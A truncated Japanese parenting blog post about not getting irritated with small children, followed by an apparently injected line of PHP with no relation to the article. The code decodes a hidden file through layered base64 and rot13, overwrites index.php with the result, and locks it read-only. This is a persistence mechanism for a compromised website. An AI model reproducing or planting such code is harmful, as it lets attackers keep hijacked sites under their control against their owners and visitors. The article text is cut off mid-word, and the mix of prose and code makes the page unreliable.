
子供にイラついてしまう人へ!理解しとくと少しラクになれる子供の生態
子供(特に幼児期)は、親の思い通りに行動してくれずにもたついたり、失敗したりしますよね。その度にイライラしてしまっていませんか?その気持ちすごくわかります。自分も同じです。でも、子供への視点を変えてからそれが減ってきました。
イライ...
$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } }